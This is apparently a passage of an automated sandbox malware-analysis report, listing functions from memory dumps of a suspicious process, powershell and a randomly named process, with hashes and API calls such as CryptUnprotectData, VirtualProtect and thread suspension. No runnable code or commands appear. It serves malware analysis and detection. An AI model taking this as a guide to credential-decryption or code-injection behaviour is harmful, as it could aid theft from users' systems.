                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2600486e41b478e4d3ac856f20ac60c118cee82a6a6d78625d13b0bf97719440
                                                                                                                    • Instruction ID: d3fe040652a33b0af4d1c71e40bd5bbd351b4d3d229b7e07d732a52f0dafc84d
                                                                                                                    • Opcode Fuzzy Hash: 2600486e41b478e4d3ac856f20ac60c118cee82a6a6d78625d13b0bf97719440
                                                                                                                    • Instruction Fuzzy Hash: C701C435A0EBCE4EE7229BA488642E97B70EB42301F0546B7C051DB1F2DA381618C741
                                                                                                                    Function 00007FFD9B7806AD Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1c779053186b7fbc8916a3e4734f191fec70342498dce9c73aa1e9b55789a7eb
                                                                                                                    • Instruction ID: c9025f080db040153fa031505262164587e336e29dbb95df6499e6361add445c
                                                                                                                    • Opcode Fuzzy Hash: 1c779053186b7fbc8916a3e4734f191fec70342498dce9c73aa1e9b55789a7eb
                                                                                                                    • Instruction Fuzzy Hash: 89F03030A06A4E9FEB94EF98D4596EE77A1FF54315F110576E81CD21B0DA3466A08B80
                                                                                                                    Function 00007FFD9B7813E0 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2ca80e5f4c8be68eae1745b18e39a781460b072909acbd9e4ee04ddba328236
                                                                                                                    • Instruction ID: 9b58ef5e16669c98320971820618c7cae1e3e7fa055fe4fd4525ea4a9f37a708
                                                                                                                    • Opcode Fuzzy Hash: c2ca80e5f4c8be68eae1745b18e39a781460b072909acbd9e4ee04ddba328236
                                                                                                                    • Instruction Fuzzy Hash: 7DF0BD70914A4D9FDF94EF58D848EAA7BE0FF28305F1105A5F818D3264D630E690CB80
                                                                                                                    Function 00007FFD9B7806D0 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e76ba0d66619528eac172e349778580941f0ac78a2fe24bca682e99e05c37370
                                                                                                                    • Instruction ID: a26e0fa2e7f083899c9fc8aea1a99cf83b6bd399a03821170910e81b77ae18e1
                                                                                                                    • Opcode Fuzzy Hash: e76ba0d66619528eac172e349778580941f0ac78a2fe24bca682e99e05c37370
                                                                                                                    • Instruction Fuzzy Hash: 2AF01230915A4E9FEB94EFA4D4496EA77F1FF14305F110566E81CD2164DA30A6A0CB80
                                                                                                                    Function 00007FFD9B7866D2 Relevance: .0, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 176f32b092650aaa9c03085f6199232841bd254698e5009ef9b55d3b40f0cc9c
                                                                                                                    • Instruction ID: 37447d83580b0fcc2606e5f62ddbbd85c5b339ac5e95646f174f54843328d7c9
                                                                                                                    • Opcode Fuzzy Hash: 176f32b092650aaa9c03085f6199232841bd254698e5009ef9b55d3b40f0cc9c
                                                                                                                    • Instruction Fuzzy Hash: 08F06B70E4AA1D8EEBB4DA54DC997E9B3B1EF54312F1151EAC10DA22A1DE741A808F01

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B94340A Relevance: .1, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55d6afa9a189d55372fd5d21add54cb921472bfee75c8fe32ae1327c789bda17
                                                                                                                    • Instruction ID: cca5c797763ab3c4487b54ac030bde4f8fde18c548e5a013c2b6ac9a5c22ed86
                                                                                                                    • Opcode Fuzzy Hash: 55d6afa9a189d55372fd5d21add54cb921472bfee75c8fe32ae1327c789bda17
                                                                                                                    • Instruction Fuzzy Hash: 0141C337A0F7F22ED3178A7998A14E53F21EF4326431D47B7C0948F0A3DE19654B86A0
                                                                                                                    Function 00007FFD9B7809B0 Relevance: 5.2, Strings: 4, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 6896ed8968b1218c0e2563e8d20a84f711b1a40b095e9cf3570118054fbd91b8
                                                                                                                    • Instruction ID: 6d35b537eb3a5f342d6a5a9b8f12eb871022cd59098d7945e4c6d0f67f8ec4b6
                                                                                                                    • Opcode Fuzzy Hash: 6896ed8968b1218c0e2563e8d20a84f711b1a40b095e9cf3570118054fbd91b8
                                                                                                                    • Instruction Fuzzy Hash: D651B10BB8E56B49E31933FD75729FD6B468FA133AB0843B7F06E890D74E18608186D5

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B856605 Relevance: .4, Instructions: 437COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1902089672.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b850000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dc7a486106ac35630fa78fa4c3813930aec66c5d70eac7b210ba3ae464d55118
                                                                                                                    • Instruction ID: 4c8646140c40e89a38decf5b30dc3e832d303080e090babd580e2ef1c11b0f8f
                                                                                                                    • Opcode Fuzzy Hash: dc7a486106ac35630fa78fa4c3813930aec66c5d70eac7b210ba3ae464d55118
                                                                                                                    • Instruction Fuzzy Hash: D0D15A72B0FA8E4FEB6597A888755B57BE0EF19314B1901FED45CC70E3DA18A805C341
                                                                                                                    Function 00007FFD9B78604D Relevance: .4, Instructions: 395COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6122b94f718a276c1fd0ff2940be010bb80a5efcf7b004312386a003844cdecc
                                                                                                                    • Instruction ID: 9548e06b41eaecfd89da82eb97051f5423b920db16fd8f4a666a836038269c7f
                                                                                                                    • Opcode Fuzzy Hash: 6122b94f718a276c1fd0ff2940be010bb80a5efcf7b004312386a003844cdecc
                                                                                                                    • Instruction Fuzzy Hash: 9111A022A0EBC94FD7139B7858745A53FB0AF13205B0A01E7D489CB0B3DA28A948C752
                                                                                                                    Function 00007FFD9B789738 Relevance: .2, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6755d07c9e9a5457da18b1f5c45ae083fee1fed551157a0cad1440511ed95654
                                                                                                                    • Instruction ID: 4d899f877b0ca1acfd9f62f46fe533ff0b42210461350ef06622dbfea170f8ef
                                                                                                                    • Opcode Fuzzy Hash: 6755d07c9e9a5457da18b1f5c45ae083fee1fed551157a0cad1440511ed95654
                                                                                                                    • Instruction Fuzzy Hash: 5A415771A0DB898FEB199F58985A6B97BE0FB55311F40427FE089C31A2DA34B9058782
                                                                                                                    Function 00007FFD9B66E620 Relevance: .1, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1900387435.00007FFD9B66D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B66D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b66d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e140b32f48e0c68141b4f47deee7a74b4da6d2492c27e5f6f8c61686f661d1dc
                                                                                                                    • Instruction ID: 804c58de8faf8f6127a9bdb6aebf5c071541f9f7ccdcc028b14dbd54ac04d24e
                                                                                                                    • Opcode Fuzzy Hash: e140b32f48e0c68141b4f47deee7a74b4da6d2492c27e5f6f8c61686f661d1dc
                                                                                                                    • Instruction Fuzzy Hash: 9841F27140EBC48FE7669B29D8559523FF0EF56220B1906EFD088CB1A3D625A846C792
                                                                                                                    Function 00007FFD9B78A64C Relevance: .1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e0fa1a2d312e323f15835d32b8151c0b181f7d64bbe9f10d65af5f77746f0743
                                                                                                                    • Instruction ID: 2824b3eb3fb7155ac4aa5a949711f615b0bda4009383a604d14a8f48a8db782c
                                                                                                                    • Opcode Fuzzy Hash: e0fa1a2d312e323f15835d32b8151c0b181f7d64bbe9f10d65af5f77746f0743
                                                                                                                    • Instruction Fuzzy Hash: 85212830A0CB4C8FDB59DFAC984A7E97FE0EB96321F04426BD049C3166DA749456CB92
                                                                                                                    Function 00007FFD9B7833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                    • Instruction ID: b0756f8a4c7956ffab13a62e7a7c7099be051ef85b7a7f41cfbc275390928040
                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                    • Instruction Fuzzy Hash: DD01677121CB0C4FD748EF0CE451AA5B7E0FB95365F10056DE58AC36A5DA36E882CB45
                                                                                                                    Function 00007FFD9B85414D Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1902089672.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b850000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a9e1701bec0bdde2deaee718f513c6b0c4b1d9db1773c9da423e66d9cdfe4e31
                                                                                                                    • Instruction ID: 3115f5b7880449fc92345cc61db7e6c38edbef0726b55428c859b148c255db7a
                                                                                                                    • Opcode Fuzzy Hash: a9e1701bec0bdde2deaee718f513c6b0c4b1d9db1773c9da423e66d9cdfe4e31
                                                                                                                    • Instruction Fuzzy Hash: B5F09032B4D5094FD769EB8CE4518D473E0EF58320B1500FAE05DC71B7CA25EC418740
                                                                                                                    Function 00007FFD9B854400 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1902089672.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b850000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7fdbca9790db0b0592f68277e17fdea0739d068ac20ec828f72cf238b2c85170
                                                                                                                    • Instruction ID: df84ded68929a182469415ff88ea2c0b56255c374192bbb4b70ee27dc1cb4649
                                                                                                                    • Opcode Fuzzy Hash: 7fdbca9790db0b0592f68277e17fdea0739d068ac20ec828f72cf238b2c85170
                                                                                                                    • Instruction Fuzzy Hash: C5F0BE32B4E5498FD768EB8CE0608A877E0FF0832071600FAE05DCB0A7DA25BC40C790
                                                                                                                    Function 00007FFD9B8541D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1902089672.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b850000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                    • Instruction ID: 0e77a6cbb02ba194589bce14a9dc6363ce941337e6a6b016bcb11bd49ac142eb
                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                    • Instruction Fuzzy Hash: 89E01A31B4C8088FDB78DB8CE0519A973E1EB98321B5601BBD14EC7575CA22ED518B80

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7884E5 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                    • API String ID: 0-2264858084
                                                                                                                    • Opcode ID: 3902736da04ea51f45f739587167b8cfa61ba78d1e51e7ae14a906f7d61370f0
                                                                                                                    • Instruction ID: 9b65e4bf9e75371e09c0b9ae5629a2bdf7d560f6e413edff0fca895715fd0318
                                                                                                                    • Opcode Fuzzy Hash: 3902736da04ea51f45f739587167b8cfa61ba78d1e51e7ae14a906f7d61370f0
                                                                                                                    • Instruction Fuzzy Hash: B4314D63E0FBD61BE366467958B50543F90EE52A6530B13FAC4E88B0B3FE24694A8211

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:5.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:45.5%
                                                                                                                    Signature Coverage:18.2%
                                                                                                                    Total number of Nodes:22
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 35489 7ffd9b93e7fd 35490 7ffd9b93e80b SuspendThread 35489->35490 35492 7ffd9b93e8e4 35490->35492 35493 7ffd9b940008 35494 7ffd9b94000a ResumeThread 35493->35494 35496 7ffd9b940114 35494->35496 35497 7ffd9b79372d 35498 7ffd9b79374f VirtualAlloc 35497->35498 35500 7ffd9b793865 35498->35500 35501 7ffd9b791d3e 35502 7ffd9b791d4d VirtualProtect 35501->35502 35504 7ffd9b791e8d 35502->35504 35505 7ffd9b941e85 35506 7ffd9b941ed2 GetFileAttributesW 35505->35506 35508 7ffd9b941f65 35506->35508 35509 7ffd9bd011ce 35510 7ffd9bd011ea 35509->35510 35511 7ffd9bd012f1 CryptUnprotectData 35510->35511 35512 7ffd9bd013ff 35511->35512 35513 7ffd9b940169 35514 7ffd9b940177 CloseHandle 35513->35514 35516 7ffd9b940254 35514->35516

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B79B60D Relevance: 5.5, Strings: 2, Instructions: 3025COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B79B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b79b000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ]K_H$hV_H
                                                                                                                    • API String ID: 0-3233018232
                                                                                                                    • Opcode ID: 855b09a95b408136248d2989f48b13d1a84297e6fbc51f5168f58956c5002261
                                                                                                                    • Instruction ID: 98ac457568e52259956b4e863bdb1bd09078574b35ae48a5296f433347cc17cf
                                                                                                                    • Opcode Fuzzy Hash: 855b09a95b408136248d2989f48b13d1a84297e6fbc51f5168f58956c5002261
                                                                                                                    • Instruction Fuzzy Hash: 7043E171A09A1D8FDBA4EF58C8A5BA9B7B1FF58300F1442E9D01DD32A5DA346E81CF41
                                                                                                                    Function 00007FFD9BD011CE Relevance: 1.8, APIs: 1, Instructions: 308encryptionCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 602 7ffd9bd011ce-7ffd9bd01289 call 7ffd9bcffd30 616 7ffd9bd0128c-7ffd9bd0129d 602->616 617 7ffd9bd0128b 602->617 618 7ffd9bd012a0-7ffd9bd013fd CryptUnprotectData 616->618 619 7ffd9bd0129f 616->619 617->616 622 7ffd9bd01405-7ffd9bd01477 618->622 623 7ffd9bd013ff 618->623 619->618 623->622
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2960144078.00007FFD9BCF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bcf0000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 834300711-0
                                                                                                                    • Opcode ID: 786960c4abe6cab9026dc506b155f7bb393edbdeacd0d59d8f3dd0261f3e41de
                                                                                                                    • Instruction ID: 05201ef71c664ee582d6c02141e2e0b7750295b74691efec1ceacc33c46c06c2
                                                                                                                    • Opcode Fuzzy Hash: 786960c4abe6cab9026dc506b155f7bb393edbdeacd0d59d8f3dd0261f3e41de
                                                                                                                    • Instruction Fuzzy Hash: 68917574A08A5C8FDB98DF68C855BE9BBF1FF5A310F0041AEE44DD3292DA349985CB41
                                                                                                                    Function 00007FFD9BD009FA Relevance: 1.7, APIs: 1, Instructions: 203encryptionCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 626 7ffd9bd009fa-7ffd9bd012ea 628 7ffd9bd012f1-7ffd9bd013fd CryptUnprotectData 626->628 629 7ffd9bd01405-7ffd9bd01477 628->629 630 7ffd9bd013ff 628->630 630->629
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2960144078.00007FFD9BCF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bcf0000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 834300711-0
                                                                                                                    • Opcode ID: 76e12274aee06737995fcd153befcc5f506e950a022f3d1edbcfc9899d542233
                                                                                                                    • Instruction ID: 54f12d3b7ab68c315ee25fa0ad848f206a8154a0308f630a56b710861788df7c
                                                                                                                    • Opcode Fuzzy Hash: 76e12274aee06737995fcd153befcc5f506e950a022f3d1edbcfc9899d542233
                                                                                                                    • Instruction Fuzzy Hash: 5251E070A08A1C8FDB98DF58C885BA9BBF1FB69310F1051AAE44DE3251DB71A985CF44
                                                                                                                    Function 00007FFD9B79CB59 Relevance: .7, Instructions: 667COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B79B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b79b000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2bd4efd03632f78315136e67f76568ac93555d458cd5c824463634e6ae605252
                                                                                                                    • Instruction ID: eeb9bd5e6640dc3649f35e191ed0e577f831581e8955170453b1aa17e4078dba
                                                                                                                    • Opcode Fuzzy Hash: 2bd4efd03632f78315136e67f76568ac93555d458cd5c824463634e6ae605252
                                                                                                                    • Instruction Fuzzy Hash: 2942EE71A0991D8FEBA8EF58C8A5BA9B7B1FF54300F1442E9D01DD32A5DA356E81CF40
                                                                                                                    Function 00007FFD9B780DA7 Relevance: .3, Instructions: 294COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b780000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e0f8c977c694649d3e24879e63977a1ecafe9d6df7e2b80b3db65d937d7e03d7
                                                                                                                    • Instruction ID: 6361322928e21550487851039ac1bce49d262e211b0b44d7875b908e080835c5
                                                                                                                    • Opcode Fuzzy Hash: e0f8c977c694649d3e24879e63977a1ecafe9d6df7e2b80b3db65d937d7e03d7
                                                                                                                    • Instruction Fuzzy Hash: DBA10174A19A4D8FE795DFA8C8757A97BE0FF96310F4002BAD04DD32E6CA782811C741
                                                                                                                    Function 00007FFD9B791D3E Relevance: 1.7, APIs: 1, Instructions: 191memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 633 7ffd9b791d3e-7ffd9b791d4b 634 7ffd9b791d56-7ffd9b791d67 633->634 635 7ffd9b791d4d-7ffd9b791d55 633->635 636 7ffd9b791d69-7ffd9b791d71 634->636 637 7ffd9b791d72-7ffd9b791e8b VirtualProtect 634->637 635->634 636->637 641 7ffd9b791e8d 637->641 642 7ffd9b791e93-7ffd9b791ee3 637->642 641->642
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b78d000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: a0282fb14130afc70ab4beb60501d20334f6e3938f95b7e11968cf6efddb6d14
                                                                                                                    • Instruction ID: 4457fc6d92cc7d9464bc700c463eea08699c14b09a7dc16981b61f442b0aa023
                                                                                                                    • Opcode Fuzzy Hash: a0282fb14130afc70ab4beb60501d20334f6e3938f95b7e11968cf6efddb6d14
                                                                                                                    • Instruction Fuzzy Hash: 65518D70D0864D8FDB54DFA8C885BEDBBF0FB56310F1042AAD449E3262DB74A885CB80
                                                                                                                    Function 00007FFD9B7CCF0D Relevance: 1.7, Strings: 1, Instructions: 434COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: TH_H
                                                                                                                    • API String ID: 0-1585845160
                                                                                                                    • Opcode ID: 50d8e28ed4326b919325f575b6b63e780eeaedeeaa0952747bdef0ff3303790b
                                                                                                                    • Instruction ID: 5454be62bf8dcaf253f8ec45232e9a2ce04b98750ff262aef4653d0cbb733aca
                                                                                                                    • Opcode Fuzzy Hash: 50d8e28ed4326b919325f575b6b63e780eeaedeeaa0952747bdef0ff3303790b
                                                                                                                    • Instruction Fuzzy Hash: 00F12F71E19A5D9FDB98EF58C4A5BB8B7A1FF54300F4442BED01DA32A2DE346980CB41
                                                                                                                    Function 00007FFD9B940008 Relevance: 1.7, APIs: 1, Instructions: 163threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 729 7ffd9b940008 730 7ffd9b94000a-7ffd9b940041 729->730 731 7ffd9b940044-7ffd9b940049 730->731 732 7ffd9b940043 730->732 731->730 733 7ffd9b94004b-7ffd9b940112 ResumeThread 731->733 732->731 737 7ffd9b940114 733->737 738 7ffd9b94011a-7ffd9b940164 733->738 737->738
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
